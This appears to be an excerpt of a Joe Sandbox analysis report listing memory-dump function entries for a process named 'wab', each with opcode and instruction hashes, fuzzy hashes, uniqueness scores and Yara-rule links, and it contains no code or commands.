                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 66b4f17d02de049712ee47179568c16d654b5e023159ea283a23166ef4c6a570
                                                              • Instruction ID: db03c8a3040783f5b8729ffe440858a167c8b49d84ce19724041fae58e577746
                                                              • Opcode Fuzzy Hash: 66b4f17d02de049712ee47179568c16d654b5e023159ea283a23166ef4c6a570
                                                              • Instruction Fuzzy Hash: 6C90026120184482D25072D94C44B0F410547E1202F95C11BA9156554CC9158DA55B21
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20253090 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1eefd5091b58627d34eb7f9eaeb632f6df1fa2ed84cb5c1a9a2b367ad08c355f
                                                              • Instruction ID: 467631868c4a8f156585f304a63581a699d278560ac5e81c04abd4ed0fe8445d
                                                              • Opcode Fuzzy Hash: 1eefd5091b58627d34eb7f9eaeb632f6df1fa2ed84cb5c1a9a2b367ad08c355f
                                                              • Instruction Fuzzy Hash: 3690026124140842D25071D98854707000687D0601F55C113A5024554D86168EB56AB1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20254340 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5a07f0b846be3f282089159eb6b6bc1738968867663efd83d03b0a49501d31fd
                                                              • Instruction ID: c4fe291d43c6fa0441cce23735a1e3d3fc24ad9ab9536020e7e7d67b6fc69515
                                                              • Opcode Fuzzy Hash: 5a07f0b846be3f282089159eb6b6bc1738968867663efd83d03b0a49501d31fd
                                                              • Instruction Fuzzy Hash: 9090027160580052925071D94CC4546400557E0301B55C113E5424554C8A148EA65761
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20254650 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bbaa651285ad19f55ae49bcc8b81e2dd01df696a02e1397fc9ae670c605e1547
                                                              • Instruction ID: f48afe5c63581c4776b5a26a13679ec109673a2b8f8363cde94d751ab3635073
                                                              • Opcode Fuzzy Hash: bbaa651285ad19f55ae49bcc8b81e2dd01df696a02e1397fc9ae670c605e1547
                                                              • Instruction Fuzzy Hash: 459002A160150082425071D94C44406600557E1301395C217A5554560C86188DA59669
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202539B0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 658dde40d0ae3e9cb3297430fec309b60ce79177143db4e57a37df3e86a1eb76
                                                              • Instruction ID: 4a0d3a6298716d12b51c175890ccda6c8d4d57c394e2febc4cd060ae7ea8305b
                                                              • Opcode Fuzzy Hash: 658dde40d0ae3e9cb3297430fec309b60ce79177143db4e57a37df3e86a1eb76
                                                              • Instruction Fuzzy Hash: CB90026124545142D26071DD4844616400567E0201F55C123A5814594D85558DA56621
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0b6d3a2669e77707eae51223474cb9701412b84b290d04747645dad1f19c20a9
                                                              • Instruction ID: 2cb6b0b057b13984a27d6b785ef3aff4c4b99c28fcee13554c1a65da0b6d3a81
                                                              • Opcode Fuzzy Hash: 0b6d3a2669e77707eae51223474cb9701412b84b290d04747645dad1f19c20a9
                                                              • Instruction Fuzzy Hash: 3E9002E1201540D24610B2D98844B0A450547E0201B55C117E6054560CC5258DA19535
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252AF0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3e0b4b11db8c076bdc3731b2a5b9206f1fba72921c2fe4a309d0bad3d92db1f2
                                                              • Instruction ID: f0a11ad760ae79a065f39f6cf8c18cac81a8db477c011d17b284661af21e2fbc
                                                              • Opcode Fuzzy Hash: 3e0b4b11db8c076bdc3731b2a5b9206f1fba72921c2fe4a309d0bad3d92db1f2
                                                              • Instruction Fuzzy Hash: 6D900265221400420255B5D90A4450B044557D6351395C117F6416590CC6218DB55721
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252AD0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2955847bde5f2897108916c65c0dadc62aabc34a9630c92901cec499d2417366
                                                              • Instruction ID: 698d7b2cdf1d19177a795c2b551fc6560520fb5c8bc9a5b68fb9ac3cdc3a987d
                                                              • Opcode Fuzzy Hash: 2955847bde5f2897108916c65c0dadc62aabc34a9630c92901cec499d2417366
                                                              • Instruction Fuzzy Hash: 8D900475311400430315F5DD0F44507004747D5351355C133F7015550CD731CDF15531
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252B60 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 15c8f429e996a1fe3704e3dc51d8e199e8b37fb7d651715e91d600684942a9d2
                                                              • Instruction ID: 2b57720d5a1c3ca457570d0bedabf1f6426682c208fe6e5dc96d84c88506c28e
                                                              • Opcode Fuzzy Hash: 15c8f429e996a1fe3704e3dc51d8e199e8b37fb7d651715e91d600684942a9d2
                                                              • Instruction Fuzzy Hash: 1C9002A120240043421571D94854616400A47E0201B55C123E6014590DC5258DE16525
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252BA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1275968644855aabbbacfad8769ce018f595f762da187fc2823922d027fb3f08
                                                              • Instruction ID: ebca88292e8104b4fafb2add07214fd9173cc3f856f603b4afb78488804d24a0
                                                              • Opcode Fuzzy Hash: 1275968644855aabbbacfad8769ce018f595f762da187fc2823922d027fb3f08
                                                              • Instruction Fuzzy Hash: F490027160540842D26071D94854746000547D0301F55C113A5024654D87558FA57AA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252B80 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 468ebcea4d631b07a76908d6cdd4db70b05718f4189f5b80d957695874d98704
                                                              • Instruction ID: 5f2712b0ad17c55627b4980185b52a6d7a47c7025b53e5abcb52c2ce0de63eba
                                                              • Opcode Fuzzy Hash: 468ebcea4d631b07a76908d6cdd4db70b05718f4189f5b80d957695874d98704
                                                              • Instruction Fuzzy Hash: 9590027120140842D21471D94C44686000547D0301F55C113AB024655E96658DE17531
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252BE0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7b19f6a503b890e22a4b8f2bf0b6aba316b7431cbf1c3472722ba994bf9e52ae
                                                              • Instruction ID: bd04fa688ba3f79ff58aa7116291ceeabfe6035a01c18f2da0f496b5db65e367
                                                              • Opcode Fuzzy Hash: 7b19f6a503b890e22a4b8f2bf0b6aba316b7431cbf1c3472722ba994bf9e52ae
                                                              • Instruction Fuzzy Hash: 1E90027120544882D25071D94844A46001547D0305F55C113A5064694D96258EA5BA61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d8234673d3eed343ea1c57d58725a4de4ccf28f4e61cf86b1fb3a2bbf1fc2b58
                                                              • Instruction ID: 69279b3f8419d2fc78532cfb3e8c7413b1909581c999d5c2c594587d5400cf63
                                                              • Opcode Fuzzy Hash: d8234673d3eed343ea1c57d58725a4de4ccf28f4e61cf86b1fb3a2bbf1fc2b58
                                                              • Instruction Fuzzy Hash: 1690027120140842D29071D9484464A000547D1301F95C117A5025654DCA158FA97BA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252C60 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4c1265101565cf361206de53491f922171b9ffac64cbeda1bbfdb91fd9f1ef0e
                                                              • Instruction ID: dde30c3b283ecf68ece6550bdafa2ae66df70dc0e8e44b1925950ce39626d8ae
                                                              • Opcode Fuzzy Hash: 4c1265101565cf361206de53491f922171b9ffac64cbeda1bbfdb91fd9f1ef0e
                                                              • Instruction Fuzzy Hash: 2E90027120140882D21071D94844B46000547E0301F55C117A5124654D8615CDA17921
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252CA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 41273acb0700ae2a955969beb52628df8dfa435fae665b831250f88709821ea3
                                                              • Instruction ID: ca7ef308389d9244e3d7c0640889fcc5c6f6c6386ce5933cd7f5ff9891dac9b8
                                                              • Opcode Fuzzy Hash: 41273acb0700ae2a955969beb52628df8dfa435fae665b831250f88709821ea3
                                                              • Instruction Fuzzy Hash: B290027120140442D21075D95848646000547E0301F55D113AA024555EC6658DE16531
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252CF0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8f42dc08bb3a0b5a82ba8bb0409a93394da566964cfd749e059610828cb0880b
                                                              • Instruction ID: 1b7f8cecc89d9fff6d7ef812dddf190452f6af618922cc725338e1e440937acf
                                                              • Opcode Fuzzy Hash: 8f42dc08bb3a0b5a82ba8bb0409a93394da566964cfd749e059610828cb0880b
                                                              • Instruction Fuzzy Hash: BD90027120140443D21071D95948707000547D0201F55D513A5424558DD6568DA16521
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2ac7864f9fde1824c1ae2b3fb77626e6e327515ee72903c2cc120f4324cf90d0
                                                              • Instruction ID: 5ef8028430631abac258c09063d045ff836cf8f5cdf7e0f64e306ffd2033da8a
                                                              • Opcode Fuzzy Hash: 2ac7864f9fde1824c1ae2b3fb77626e6e327515ee72903c2cc120f4324cf90d0
                                                              • Instruction Fuzzy Hash: E190026160540442D25071D95858706001547D0201F55D113A5024554DC6598FA56AA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 307b1e7467edb29ebe6613e197e5eac5c2a51cf25069c8f8423feb74054864b6
                                                              • Instruction ID: b164f8bc0876c4c535f693e6e517a009fb540f6d5a130675e8d799b6713ca104
                                                              • Opcode Fuzzy Hash: 307b1e7467edb29ebe6613e197e5eac5c2a51cf25069c8f8423feb74054864b6
                                                              • Instruction Fuzzy Hash: 3A90026130140043D25071D95858606400597E1301F55D113E5414554CD9158DA65622
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252D00 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0a8afe0e85028343bca27a4b9e4f540b254036410f5b25cf1d51d351d1031636
                                                              • Instruction ID: fa2a30123e8fb27a5a9d6076bfba0225e72e29502495b5616515820b79b7c094
                                                              • Opcode Fuzzy Hash: 0a8afe0e85028343bca27a4b9e4f540b254036410f5b25cf1d51d351d1031636
                                                              • Instruction Fuzzy Hash: A190026120544482D21075D95848A06000547D0205F55D113A6064595DC6358DA1A531
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20253D10 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf018a9c4e8cd354906dc66e456d966d601373a8914a715a84f62d3a154bb11d
                                                              • Instruction ID: 914ebc0ab2c92e5d9bcdfb554712321f1b816f3e58767ae290af25bcac599936
                                                              • Opcode Fuzzy Hash: bf018a9c4e8cd354906dc66e456d966d601373a8914a715a84f62d3a154bb11d
                                                              • Instruction Fuzzy Hash: 0D90027120240182965072D95C44A4E410547E1302B95D517A5015554CC9148DB15621
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a86314e0eaa102ede2ed7e6dc9f42772f08628171fded0b1f433c515fdf62316
                                                              • Instruction ID: b94bfd8a1ed5468fa6619dc23548cf8d5089b7ad715635349955d538d110e762
                                                              • Opcode Fuzzy Hash: a86314e0eaa102ede2ed7e6dc9f42772f08628171fded0b1f433c515fdf62316
                                                              • Instruction Fuzzy Hash: 0E90026921340042D29071D9584860A000547D1202F95D517A5015558CC9158DB95721
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20253D70 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e0aeae765192b5f86f9525ed359df1a03e37f7fe6a01a228435956c878e2c5e9
                                                              • Instruction ID: f4f5845f02fd87dcc7e28e6281ed58abc8014f7be6e005c3e3581757185bbaca
                                                              • Opcode Fuzzy Hash: e0aeae765192b5f86f9525ed359df1a03e37f7fe6a01a228435956c878e2c5e9
                                                              • Instruction Fuzzy Hash: 6890027520140442D62071D95C44646004647D0301F55D513A5424558D86548DF1A521
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252DB0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ea0218a30acf8cf00722a773ecd41fe19393532f7a8344b75a6fb458977cf317
                                                              • Instruction ID: f7acbe40db2d1b443fb2eeafa332497dc43e7978e6cfe81835f57b9e35ca04b6
                                                              • Opcode Fuzzy Hash: ea0218a30acf8cf00722a773ecd41fe19393532f7a8344b75a6fb458977cf317
                                                              • Instruction Fuzzy Hash: 9190027124140442D25171D94844606000957D0241F95C113A5424554E86558FA6AE61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252DD0 Relevance: .0, Instructions: 4COMMON
